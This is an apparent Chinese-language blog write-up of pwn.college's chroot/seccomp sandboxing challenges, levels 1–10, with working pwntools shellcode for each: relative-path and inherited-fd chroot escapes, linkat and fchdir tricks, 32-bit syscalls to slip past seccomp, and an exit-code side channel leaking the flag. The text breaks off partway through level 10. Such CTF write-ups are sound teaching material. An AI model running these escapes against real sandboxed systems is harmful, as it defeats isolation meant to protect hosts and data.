

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/Pi.png">
  <link rel="icon" href="/img/Pi.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Lobo Q1ng">
  <meta name="keywords" content="">
  
    <meta name="description" content="侧信道还挺有意思的，所以rob是怎么在level 12中只调用一次程序就get flag呢？">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn.college: Sanboxing">
<meta property="og:url" content="https://loboq1ng.github.io/2025/06/09/pwn-college-Sanboxing/index.html">
<meta property="og:site_name" content="Q1ng&#39;s blog">
<meta property="og:description" content="侧信道还挺有意思的，所以rob是怎么在level 12中只调用一次程序就get flag呢？">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://loboq1ng.github.io/2025/06/09/pwn-college-Sanboxing/image-20250609151346303.png">
<meta property="article:published_time" content="2025-06-09T08:57:03.000Z">
<meta property="article:modified_time" content="2025-06-09T09:00:41.448Z">
<meta property="article:author" content="Lobo Q1ng">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="pwn.college">
<meta property="article:tag" content="kernel">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://loboq1ng.github.io/2025/06/09/pwn-college-Sanboxing/image-20250609151346303.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>pwn.college: Sanboxing - Q1ng&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"loboq1ng.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 80vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Q1ng&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/pwn_college.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="pwn.college: Sanboxing"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-06-09 16:57" pubdate>
          2025年6月9日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.7k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          72 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span>次
        </span>
        

      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">pwn.college: Sanboxing</h1>
            
            
              <div class="markdown-body">
                
                <p>侧信道还挺有意思的，所以rob是怎么在level 12中只调用一次程序就get flag呢？</p>
<span id="more"></span>

<h1 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h1><p>通过<code>chroot</code>把随机生成的一个路径”&#x2F;tmp&#x2F;jail-XXXX”替换为根目录，也就是”&#x2F;“。随后它会打开”&#x2F;flag”，但是这个<code>/flag</code>在经过”chroot”后已经变成了<code>/tmp/jail-xxxx/flag</code>，这个flag是通过<code>open,wirte</code>创建的一个假的flag。最后有一个<code>sendfile()</code>，打开我们参数传递的路径。那很简单了，直接传递<code>../../flag</code>这样就去到了<code>/flag</code>，即<code>/tmp/jail-xxxx/../../flag</code></p>
<h1 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h1><p>源码中会通过<code>read()</code>读取用户输入到一个<code>mmap</code>出来的一个空间，并使用JIT的方式执行它。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level2&quot;</span>,<span class="hljs-string">&#x27;arg1&#x27;</span>, <span class="hljs-string">&#x27;arg2&#x27;</span>])<br><br>shellcode = asm(shellcraft.chmod(<span class="hljs-string">&quot;../../flag&quot;</span>, <span class="hljs-number">0o777</span>))<br>p.send(shellcode)<br><br><span class="hljs-comment"># p.interactive()</span><br></code></pre></td></tr></table></figure>



<h1 id="level-3"><a href="#level-3" class="headerlink" title="level 3"></a>level 3</h1><p>源码中通过以下方式，防止使用<em>相对路径</em>进行逃逸：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Moving the current working directory into the jail.\n&quot;</span>);<br>assert(chdir(<span class="hljs-string">&quot;/&quot;</span>) == <span class="hljs-number">0</span>);<br></code></pre></td></tr></table></figure>

<p>将工作目录切换到<code>jail</code>内的根目录。</p>
<blockquote>
<p>为什么需要切换到<code>jail</code>内的根目录能够防止相对路径逃逸呢？</p>
<p>由于<code>chroot</code>的限制，这题源码中的<code>chroot(jail_path)</code>仅将进程的<em>逻辑根目录</em>改为<code>jail_path</code>，但<strong>不自动改变工作目录。</strong></p>
<p>如果未调用<code>chdir(&quot;/&quot;)</code>，进程的工作目录仍然在jail外。所以level2可以通过相对路径进行逃脱。</p>
</blockquote>
<p>这里还有一个问题，就是无法使用软连接：<code>int fd = open(argv[1], O_RDONLY|O_NOFOLLOW);</code>参数<code>O_NOFOLLOW</code>表示不要跟随符号链接。当要打开的文件是符号链接时，<code>open()</code>会拒绝打开它。</p>
<p>但是，open是能够打开目录的，并且后续可以用<code>openat</code>打开<code>dirfd</code>中的文件。而进入jail后，已经存在的资源并不会失效。因此，可以通过先传参数，执行<code>open(&#39;/&#39;, O_RDONLY|O_NOFOLLOW);</code>获得目录文件描述符。随后在shellcode中构造<code>openat(dirfd, &#39;flag&#39;, O_RDONLY, 0);</code>使得获得<code>/flag</code>的文件描述符。最后通过<code>sendfile()</code>将其打印出来。exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level3&quot;</span>, <span class="hljs-string">&quot;/&quot;</span>, <span class="hljs-string">&quot;arg2&quot;</span>])<br><br>shellcode = asm(shellcraft.openat(<span class="hljs-number">3</span>, <span class="hljs-string">&#x27;flag&#x27;</span>, os.O_RDONLY, <span class="hljs-number">0</span>))<br>shellcode += asm(shellcraft.syscall(<span class="hljs-number">40</span>, <span class="hljs-number">1</span>, <span class="hljs-number">4</span>, <span class="hljs-number">0</span>, <span class="hljs-number">100</span>))<br>shellcode += asm(shellcraft.exit())<br>p.send(shellcode)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-4"><a href="#level-4" class="headerlink" title="level 4"></a>level 4</h1><p>题目给了条件，能够使用的系统调用为：<code>openat, read, write, sendfile</code>。前面用到的exp删了exit即可。</p>
<h1 id="level-5"><a href="#level-5" class="headerlink" title="level 5"></a>level 5</h1><p>能够使用的系统调用为：<code>linkat, open, read, write, sendfile</code>。</p>
<p><code>linkat()</code>系统调用是一个用于创建硬链接(hard link)的系统调用，<code>linkat()</code>允许你在指定的目录文件描述符上下文中创建硬链接，这对于<code>chroot()</code>或其他文件系统隔离环境中工作时十分有用。</p>
<p>可以通过<code>linkat()</code>将根目录下的<code>flag</code>链接到<code>jail</code>中。然后再通过<code>open, sendfile</code>将其打印出来。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level5&quot;</span>, <span class="hljs-string">&quot;/&quot;</span>, <span class="hljs-string">&quot;arg2&quot;</span>])<br><span class="hljs-comment"># p = gdb.debug([&quot;/challenge/babyjail_level5&quot;, &quot;/&quot;, &quot;arg2&quot;], &quot;b *main+1498&quot;)</span><br><br>shellcode = asm(shellcraft.<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;./&#x27;</span>, os.O_RDONLY |os.O_DIRECTORY, <span class="hljs-number">0</span>))<br>shellcode += asm(shellcraft.linkat(<span class="hljs-number">3</span>, <span class="hljs-string">&#x27;flag&#x27;</span>, <span class="hljs-number">4</span>, <span class="hljs-string">&#x27;f&#x27;</span> ,<span class="hljs-number">0</span>))<br>shellcode += asm(shellcraft.<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;./f&#x27;</span>, os.O_RDONLY , <span class="hljs-number">0</span>))<br>shellcode += asm(shellcraft.syscall(<span class="hljs-number">40</span>, <span class="hljs-number">1</span>, <span class="hljs-number">5</span>, <span class="hljs-number">0</span>, <span class="hljs-number">100</span>))<br>p.send(shellcode)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-6"><a href="#level-6" class="headerlink" title="level 6"></a>level 6</h1><p>能够使用的系统调用为：<code>fchdir, open, read, write, sendfile</code></p>
<p><code>fchdir()</code>用于<strong>将当前工作目录切换到由一个打开的目录文件描述符所表示的目录。</strong></p>
<p><code>int fchdir(int fd);</code> 其中fd指向一个目录的有效文件描述符，通常通过<code>open()</code>打开并加上<code>O_DIRECTORY</code>标志。成功返回0，失败返回-1</p>
<p>可以通过<code>fchdir()</code>将当前目录切换到之前已经open开的目录下，然后再获取flag即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level6&quot;</span>, <span class="hljs-string">&quot;/&quot;</span>, <span class="hljs-string">&quot;arg2&quot;</span>])<br><br>shellcode = asm(shellcraft.syscall(<span class="hljs-string">&#x27;SYS_fchdir&#x27;</span>, <span class="hljs-number">3</span>))<br>shellcode += asm(shellcraft.<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;flag&#x27;</span>, os.O_RDONLY , <span class="hljs-number">0</span>))<br>shellcode += asm(shellcraft.syscall(<span class="hljs-number">40</span>, <span class="hljs-number">1</span>, <span class="hljs-number">4</span>, <span class="hljs-number">0</span>, <span class="hljs-number">100</span>))<br>p.send(shellcode)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-7"><a href="#level-7" class="headerlink" title="level 7"></a>level 7</h1><p>可用的系统调用为：<code>chdir, chroot, mkdir, open, read, write, sendfile</code></p>
<p>其中，<code>chroot()</code>用于<strong>将当前进程的根目录(<code>/</code>)改变为指定路径。</strong> 这个改变只影响当前进程及其子进程，其他进程不受影响。</p>
<p><code>int chroot(const char *path);</code>传递参数为新根目录的路径</p>
<p><code>chdir()</code>用于<strong>更改当前进程的工作目录。</strong></p>
<p><code>int chdir(const char *path);</code>传递参数为需要切换到的目录路径，可以是绝对路径或相对路径。成功返回0，失败返回-1</p>
<p><code>mkdir()</code>用于<strong>创建目录。</strong></p>
<p><code>int mkdir(const char *pathname, mode_t mode);</code>参数<code>pathname</code>为要创建的目录路径（可以是相对路径或绝对路径）。参数<code>mode</code>是新目录的权限位。</p>
<p><strong><code>chroot</code>只改变<code>/</code>解析基准，不改变cwd。</strong> 如果不调用<code>chdir(&quot;/&quot;)</code>的话，那么当前目录仍可能在新根之外。那么此时的相对路径便有用了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level7&quot;</span>, <span class="hljs-string">&quot;/&quot;</span>, <span class="hljs-string">&quot;arg2&quot;</span>])<br><br>shellcode = asm(shellcraft.mkdir(<span class="hljs-string">&quot;jail&quot;</span>, <span class="hljs-number">0o755</span>))<br>shellcode += asm(shellcraft.pushstr(<span class="hljs-string">&#x27;./jail&#x27;</span>))<br>shellcode += asm(shellcraft.syscall(<span class="hljs-string">&#x27;SYS_chroot&#x27;</span>, <span class="hljs-string">&#x27;rsp&#x27;</span>))<br>shellcode += asm(shellcraft.<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;../../flag&#x27;</span>, os.O_RDONLY , <span class="hljs-number">0</span>))<br>shellcode += asm(shellcraft.syscall(<span class="hljs-number">40</span>, <span class="hljs-number">1</span>, <span class="hljs-number">4</span>, <span class="hljs-number">0</span>, <span class="hljs-number">100</span>))<br>p.send(shellcode)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-8"><a href="#level-8" class="headerlink" title="level 8"></a>level 8</h1><p>可用的系统调用为：<code>openat, read, write, sendfile</code>。但现在给予给程序的参数并不会被用上，也就是说没有jail外的fd资源了。</p>
<p>那么需要我们创建一个jail外的fd资源。还记得之前有个绑定fd的方法：<code>exec 3&lt;&gt;a</code>，将文件a绑定至文件描述符4。这一关这里不能用<code>&lt;&gt;</code>符号，因为<code>&lt;</code>表示可读，<code>&gt;</code>表示可写。我们并没有根目录可写的权限。但是是可读的。</p>
<p>执行<code>exec 3&lt; /</code>后，将根目录绑定至文件描述符4。随后再设置<code>process</code>中的<code>close_fds</code>为<code>False</code>，使得执行程序时继承fd。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level8&quot;</span>, <span class="hljs-string">&quot;arg1&quot;</span>], close_fds=<span class="hljs-literal">False</span>)<br><br><br>shellcode = asm(shellcraft.openat(<span class="hljs-number">3</span>, <span class="hljs-string">&#x27;flag&#x27;</span>, os.O_RDONLY, <span class="hljs-number">0</span>))<br>shellcode += asm(shellcraft.syscall(<span class="hljs-number">40</span>, <span class="hljs-number">1</span>, <span class="hljs-number">4</span>, <span class="hljs-number">0</span>, <span class="hljs-number">100</span>))<br>p.send(shellcode)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-9"><a href="#level-9" class="headerlink" title="level 9"></a>level 9</h1><p>可用的系统调用为：<code>close, stat, fstat, lstat</code></p>
<p>close用来关闭文件描述符。<code>stat()</code>用于获取文件或目录的详细信息的系统调用。<code>int stat(const char *pathname, struct stat *statbuf);</code>第一个参数为需要获取信息的文件或目录路径。第二个参数是一个指向<code>struct stat</code>结构体的指针，该结构体将包含文件的元数据。</p>
<p><code>fstat()</code>类似于<code>stat()</code>，但它基于文件描述符获取文件的元数据。<code>int fstat(int fd, struct stat *statbuf);</code></p>
<p><code>lstat()</code>用来获取符号链接的信息，而不是符号链接指向的文件的信息。</p>
<p>但有一个关键是源文件中：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Adding architecture to seccomp filter: x86_32.\n&quot;</span>);<br>seccomp_arch_add(ctx, SCMP_ARCH_X86);<br></code></pre></td></tr></table></figure>

<p>根据它允许的系统调用列表，可知允许的系统调用号分别为<code>3,4,5,6</code>。而最终应用于32位，在32位这四个系统调用分别为：<code>read, write, open, close</code>。</p>
<p>而这题是没有jail的。也就是需要我们在64位架构下，用32位的shellcode。这是需要手动生成的。</p>
<p>注意，在生成的shellcode中是无法使用栈存储字符串变量（<code>/flag</code>），因为shellcode是32位的，使用<code>int 80</code>进行系统调用，如果将其<code>push</code>进栈，再将其存入<code>rbx</code>中是无效的，因为<code>int 80</code>系统调用只会访问<code>ebx</code>。所以会<code>open</code>失效。</p>
<p>思路是，使用32位的系统调用，用<code>open,read,write</code>系统调用拿到flag。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&quot;i386&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level9&quot;</span>, <span class="hljs-string">&quot;arg1&quot;</span>])<br><span class="hljs-comment"># p = gdb.debug([&quot;/challenge/babyjail_level9&quot;, &quot;arg1&quot;], &quot;b *main+787&quot;, close_fds=False)</span><br><br><br><span class="hljs-comment"># shellcode = shellcraft.open(&quot;/flag&quot;)</span><br>shellcode = <span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">    mov eax, 5</span><br><span class="hljs-string">    mov ebx, 0x1337034</span><br><span class="hljs-string">    xor ecx, ecx</span><br><span class="hljs-string">    xor edx, edx</span><br><span class="hljs-string">    int 0x80</span><br><span class="hljs-string">&quot;&quot;&quot;</span><br>shellcode += shellcraft.read(<span class="hljs-number">3</span>, <span class="hljs-number">0x1337100</span>, <span class="hljs-number">0x40</span>)<br>shellcode += shellcraft.write(<span class="hljs-number">1</span>, <span class="hljs-number">0x1337100</span>, <span class="hljs-number">0x40</span>)<br><br><span class="hljs-comment"># print(len(asm(shellcode)))</span><br><span class="hljs-comment"># pause()</span><br>p.send(asm(shellcode) + <span class="hljs-string">b&#x27;/flag&#x27;</span>)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-10"><a href="#level-10" class="headerlink" title="level 10"></a>level 10</h1><blockquote>
<p>Escape a chroot sandbox using shellcode, but this time only using the following syscalls: [“read”, “exit”]. Note that “write” is disabled! You will need a creative way of extracting the flag data from your process!</p>
</blockquote>
<p>能用的系统调用为：<code>read, exit</code>。这一关是正常的64位架构的<code>seccomp</code>，能够执行<code>open()</code>以及<code>read()</code>。剩下需要做的就是泄露出来。提供了<code>exit()</code>，那么如rob在课上讲的，可以每次将flag的一个字节作为<code>exit()</code>的代码。这样就能泄露出flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>flag = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0x39</span>):<br>    p = process([<span class="hljs-string">&quot;/challenge/babyjail_level10&quot;</span>, <span class="hljs-string">&quot;/flag&quot;</span>, <span class="hljs-string">&quot;arg2&quot;</span>])<br>    <span class="hljs-comment"># p = gdb.debug([&quot;/challenge/babyjail_level9&quot;, &quot;arg1&quot;], &quot;b *main+787&quot;, close_fds=False)</span><br>    shellcode = shellcraft.read(<span class="hljs-number">3</span>, <span class="hljs-number">0x1337100</span>, <span class="hljs-number">0x39</span>)<br>    shellcode += <span class="hljs-string">f&quot;movzx rdi, byte ptr [0x1337100 + <span class="hljs-subst">&#123;i&#125;</span>]&quot;</span><br>    shellcode += shellcraft.exit(<span class="hljs-string">&#x27;rdi&#x27;</span>)<br>    p.send(asm(shellcode))<br>    p.wait()<br>    exit_code = p.poll()<br><br>    flag += <span class="hljs-built_in">chr</span>(exit_code &amp; <span class="hljs-number">0xff</span>)<br><br><span 